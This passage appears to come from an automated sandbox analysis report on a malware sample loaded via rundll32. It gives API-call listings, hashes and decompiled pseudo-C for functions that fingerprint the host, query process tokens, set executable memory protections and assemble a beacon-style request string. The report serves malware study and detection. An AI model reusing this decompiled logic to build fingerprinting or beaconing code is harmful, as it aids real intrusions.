                                                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,6F031668,?), ref: 6F031B00
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F031668,?), ref: 6F031B3E
                                                                                                              • Part of subcall function 6F031397: HeapFree.KERNEL32(00000000,?,6F031B4C,00000000,?,?,?,6F031668,?), ref: 6F0313A3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 1691993961-1084903527
                                                                                                            • Opcode ID: 61ccb46067dd71d790fcbbf211b25d7bfd56340268e0fc3123a1406ffaa92ee0
                                                                                                            • Instruction ID: 319d638f87fc865e312b9c8117685bd9b03f7606010509ab1a70ac9f3629e572
                                                                                                            • Opcode Fuzzy Hash: 61ccb46067dd71d790fcbbf211b25d7bfd56340268e0fc3123a1406ffaa92ee0
                                                                                                            • Instruction Fuzzy Hash: 7001B133E00A37E7CB2197698C44B8FBAE9DF8E790B010122E90097240FB70D84186A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: rundll32.exe PID: 5692 Parent PID: 3144 rundll32.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 0303A82B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0303A82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x303d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E030360B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x303d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x303d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0303789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x303d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x303d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0303789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x303d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                            0x0303a82b
                                                                                                            0x0303a833
                                                                                                            0x0303a837
                                                                                                            0x0303a83a
                                                                                                            0x0303a83f
                                                                                                            0x0303a841
                                                                                                            0x0303a846
                                                                                                            0x0303a846
                                                                                                            0x0303a84c
                                                                                                            0x0303a84e
                                                                                                            0x0303a85b
                                                                                                            0x0303a8bc
                                                                                                            0x0303a85d
                                                                                                            0x0303a862
                                                                                                            0x0303a868
                                                                                                            0x0303a86d
                                                                                                            0x0303a87b
                                                                                                            0x0303a87f
                                                                                                            0x0303a88e
                                                                                                            0x0303a895
                                                                                                            0x0303a89c
                                                                                                            0x0303a89c
                                                                                                            0x0303a8a7
                                                                                                            0x0303a8a7
                                                                                                            0x0303a87f
                                                                                                            0x0303a86d
                                                                                                            0x0303a8be
                                                                                                            0x0303a8c4
                                                                                                            0x0303a8ce
                                                                                                            0x0303a8d0
                                                                                                            0x0303a8d5
                                                                                                            0x0303a8e4
                                                                                                            0x0303a8e8
                                                                                                            0x0303a8f3
                                                                                                            0x0303a8fa
                                                                                                            0x0303a901
                                                                                                            0x0303a901
                                                                                                            0x0303a90d
                                                                                                            0x0303a90d
                                                                                                            0x0303a8e8
                                                                                                            0x0303a918
                                                                                                            0x0303a91a
                                                                                                            0x0303a91d
                                                                                                            0x0303a91f
                                                                                                            0x0303a922
                                                                                                            0x0303a925
                                                                                                            0x0303a92f
                                                                                                            0x0303a933
                                                                                                            0x0303a937

                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0303A862
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0303A879
                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0303A886
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0303538B), ref: 0303A8A7
                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0303A8CE
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0303A8E2
                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0303A8EF
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0303538B), ref: 0303A90D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3239747167-1536154274
                                                                                                            • Opcode ID: 6c6c5d86565d6e474fa6a6c05aeea5384109640ee412efcbf188bbe6178a1f4c
                                                                                                            • Instruction ID: 333e8ed5d98e4ade6c7a67b09c042153acc40152acc411a0e109e73175c35aee
                                                                                                            • Opcode Fuzzy Hash: 6c6c5d86565d6e474fa6a6c05aeea5384109640ee412efcbf188bbe6178a1f4c
                                                                                                            • Instruction Fuzzy Hash: 57313B71A01209EFEB20EFA9DD80AAEF7FDFF49200F15406AE545E3204DB34DA019B10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0DDFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6F0DDA28), ref: 6F0DE097
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6F0DDA88), ref: 6F0DE0CE
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6F0DE12E
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE164
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00000000,00000004,6F0DDFB9), ref: 6F0DE269
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00001000,00000004,6F0DDFB9), ref: 6F0DE290
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9), ref: 6F0DE35D
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9,?), ref: 6F0DE3B3
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE3CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753564026.000000006F0DD000.00000040.00020000.sdmp, Offset: 6F0DD000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Protect$Alloc$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574235972-0
                                                                                                            • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction ID: 2512d9ebc86b1d5572e1fe27dd23102369d4e81253cfc23d2c29ea2b3eba83e7
                                                                                                            • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction Fuzzy Hash: 62D158726206209FDB12CF18CD80B5677E7EF48B92F0841A5ED4A9F35AD770BA41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035D10, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 38%
                                                                                                            			E03035D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E030375F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E03034AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                            0x03035d1d
                                                                                                            0x03035d1e
                                                                                                            0x03035d1f
                                                                                                            0x03035d20
                                                                                                            0x03035d21
                                                                                                            0x03035d25
                                                                                                            0x03035d2c
                                                                                                            0x03035d3b
                                                                                                            0x03035d3e
                                                                                                            0x03035d41
                                                                                                            0x03035d48
                                                                                                            0x03035d4b
                                                                                                            0x03035d4e
                                                                                                            0x03035d51
                                                                                                            0x03035d54
                                                                                                            0x03035d5f
                                                                                                            0x03035d61
                                                                                                            0x03035d6a
                                                                                                            0x03035d72
                                                                                                            0x03035d74
                                                                                                            0x03035d86
                                                                                                            0x03035d90
                                                                                                            0x03035d94
                                                                                                            0x03035da3
                                                                                                            0x03035da7
                                                                                                            0x03035db0
                                                                                                            0x03035db8
                                                                                                            0x03035db8
                                                                                                            0x03035dba
                                                                                                            0x03035dba
                                                                                                            0x03035dc2
                                                                                                            0x03035dc8
                                                                                                            0x03035dcc
                                                                                                            0x03035dcc
                                                                                                            0x03035dd7

                                                                                                            APIs
                                                                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03035D57
                                                                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 03035D6A
                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03035D86
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03035DA3
                                                                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 03035DB0
                                                                                                            • NtClose.NTDLL(?), ref: 03035DC2
                                                                                                            • NtClose.NTDLL(00000000), ref: 03035DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2575439697-0
                                                                                                            • Opcode ID: 87a923d4beb9ccb55ed6045fbb3fa28288449db07bc20bc664e82eee7d6f23ec
                                                                                                            • Instruction ID: 24ef43af4b5f7afb6b9629ebcaecc8ee8782dba857fad1ada154d50f8936e7dc
                                                                                                            • Opcode Fuzzy Hash: 87a923d4beb9ccb55ed6045fbb3fa28288449db07bc20bc664e82eee7d6f23ec
                                                                                                            • Instruction Fuzzy Hash: 0821E976901218BBEB11EF95CC45EDEBFBDEF4A750F104416F901F6120D7719A449BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F045600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030344A4, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E030344A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x303d018; // 0x3dd6b064
				asm("bswap eax");
				_t27 =  *0x303d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x303d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x303d00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0x303d2e0; // 0x22da5a8
				_t3 = _t30 + 0x303e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x303d02c,  *0x303d004, _t25);
				_t33 = E03035B60();
				_t34 =  *0x303d2e0; // 0x22da5a8
				_t4 = _t34 + 0x303e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E03031BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x303d2e0; // 0x22da5a8
					_t6 = _t83 + 0x303e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x303d270, 0, _t96);
				}
				_t97 = E0303137A();
				if(_t97 != 0) {
					_t78 =  *0x303d2e0; // 0x22da5a8
					_t8 = _t78 + 0x303e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x303d270, 0, _t97);
				}
				_t98 =  *0x303d364; // 0x53195b0
				_a32 = E03033857(0x303d00a, _t98 + 4);
				_t42 =  *0x303d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x303d2e0; // 0x22da5a8
					_t11 = _t74 + 0x303e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x303d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x303d2e0; // 0x22da5a8
					_t13 = _t71 + 0x303e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x303d270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E0303A811(GetTickCount());
						_t50 =  *0x303d364; // 0x53195b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x303d364; // 0x53195b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x303d364; // 0x53195b0
						_t103 = E03031974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x303c2ac);
							_push(_t103);
							_t62 = E030338CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E03032A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E030347D5();
								}
								RtlFreeHeap( *0x303d270, 0, _v44); // executed
							}
							HeapFree( *0x303d270, 0, _t103);
						}
						RtlFreeHeap( *0x303d270, 0, _t100); // executed
					}
					HeapFree( *0x303d270, 0, _a24);
				}
				RtlFreeHeap( *0x303d270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                            0x030344a4
                                                                                                            0x030344a4
                                                                                                            0x030344a4
                                                                                                            0x030344a9
                                                                                                            0x030344af
                                                                                                            0x030344b9
                                                                                                            0x030344bb
                                                                                                            0x030344bb
                                                                                                            0x030344c8
                                                                                                            0x030344d3
                                                                                                            0x030344d6
                                                                                                            0x030344e1
                                                                                                            0x030344e4
                                                                                                            0x030344e9
                                                                                                            0x030344ec
                                                                                                            0x030344f1
                                                                                                            0x030344f4
                                                                                                            0x03034500
                                                                                                            0x0303450d
                                                                                                            0x0303450f
                                                                                                            0x03034515
                                                                                                            0x0303451a
                                                                                                            0x03034525
                                                                                                            0x03034527
                                                                                                            0x0303452a
                                                                                                            0x0303452c
                                                                                                            0x03034531
                                                                                                            0x03034535
                                                                                                            0x03034537
                                                                                                            0x0303453c
                                                                                                            0x03034548
                                                                                                            0x0303454a
                                                                                                            0x03034556
                                                                                                            0x03034558
                                                                                                            0x03034558
                                                                                                            0x03034563
                                                                                                            0x03034567
                                                                                                            0x03034569
                                                                                                            0x0303456e
                                                                                                            0x0303457a
                                                                                                            0x0303457c
                                                                                                            0x03034588
                                                                                                            0x0303458a
                                                                                                            0x0303458a
                                                                                                            0x03034590
                                                                                                            0x030345a3
                                                                                                            0x030345a7
                                                                                                            0x030345ae
                                                                                                            0x030345b1
                                                                                                            0x030345b6
                                                                                                            0x030345c1
                                                                                                            0x030345c3
                                                                                                            0x030345c6
                                                                                                            0x030345c6
                                                                                                            0x030345c8
                                                                                                            0x030345cf
                                                                                                            0x030345d2
                                                                                                            0x030345d7
                                                                                                            0x030345e1
                                                                                                            0x030345e3
                                                                                                            0x030345eb
                                                                                                            0x030345fe
                                                                                                            0x03034604
                                                                                                            0x03034608
                                                                                                            0x03034614
                                                                                                            0x03034619
                                                                                                            0x03034622
                                                                                                            0x03034633
                                                                                                            0x03034637
                                                                                                            0x03034640
                                                                                                            0x03034646
                                                                                                            0x03034653
                                                                                                            0x03034660
                                                                                                            0x03034666
                                                                                                            0x03034672
                                                                                                            0x03034678
                                                                                                            0x03034679
                                                                                                            0x0303467e
                                                                                                            0x03034684
                                                                                                            0x0303468a
                                                                                                            0x03034691
                                                                                                            0x03034698
                                                                                                            0x0303469e
                                                                                                            0x030346a5
                                                                                                            0x030346a9
                                                                                                            0x030346b4
                                                                                                            0x030346b9
                                                                                                            0x030346bf
                                                                                                            0x030346c8
                                                                                                            0x030346c8
                                                                                                            0x030346d9
                                                                                                            0x030346d9
                                                                                                            0x030346e8
                                                                                                            0x030346e8
                                                                                                            0x030346f7
                                                                                                            0x030346f7
                                                                                                            0x03034709
                                                                                                            0x03034709
                                                                                                            0x03034718
                                                                                                            0x03034729

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 030344BB
                                                                                                            • wsprintfA.USER32 ref: 03034508
                                                                                                            • wsprintfA.USER32 ref: 03034525
                                                                                                            • wsprintfA.USER32 ref: 03034548
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03034558
                                                                                                            • wsprintfA.USER32 ref: 0303457A
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0303458A
                                                                                                            • wsprintfA.USER32 ref: 030345C1
                                                                                                            • wsprintfA.USER32 ref: 030345E1
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 030345FE
                                                                                                            • GetTickCount.KERNEL32 ref: 0303460E
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 03034622
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03034640
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 03031974: strcpy.NTDLL ref: 030319BE
                                                                                                              • Part of subcall function 03031974: lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03031974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                            • StrTrimA.SHLWAPI(00000000,0303C2AC,?,053195B0), ref: 03034672
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030338CA: lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                              • Part of subcall function 030338CA: lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 03034691
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 03034698
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 030346A5
                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 030346A9
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 030346D9
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 030346E8
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,053195B0), ref: 030346F7
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03034709
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?), ref: 03034718
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3963266935-1536154274
                                                                                                            • Opcode ID: 03ae7d9ab11fab18aec4c46d95f62025d4fcbfe9b0c5dce1ad729ad9b4c6c38b
                                                                                                            • Instruction ID: a9b2aa040e78c9d1313dfa13ffcf69b6d08ba4f9c01f0d8a1fe74436de8a9fc2
                                                                                                            • Opcode Fuzzy Hash: 03ae7d9ab11fab18aec4c46d95f62025d4fcbfe9b0c5dce1ad729ad9b4c6c38b
                                                                                                            • Instruction Fuzzy Hash: D161BD76502200AFD721FB68EC88F9677ECFB49740F080524F909DB255DB39E816CB6A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035461, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E03035461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x303d278);
					_v20 = 0;
					_v16 = 0;
					L0303AED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x303d2a4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x303d284 = 5;
						} else {
							_t68 = E0303502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x303d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0303577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E03032107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x303d27c);
							goto L21;
						} else {
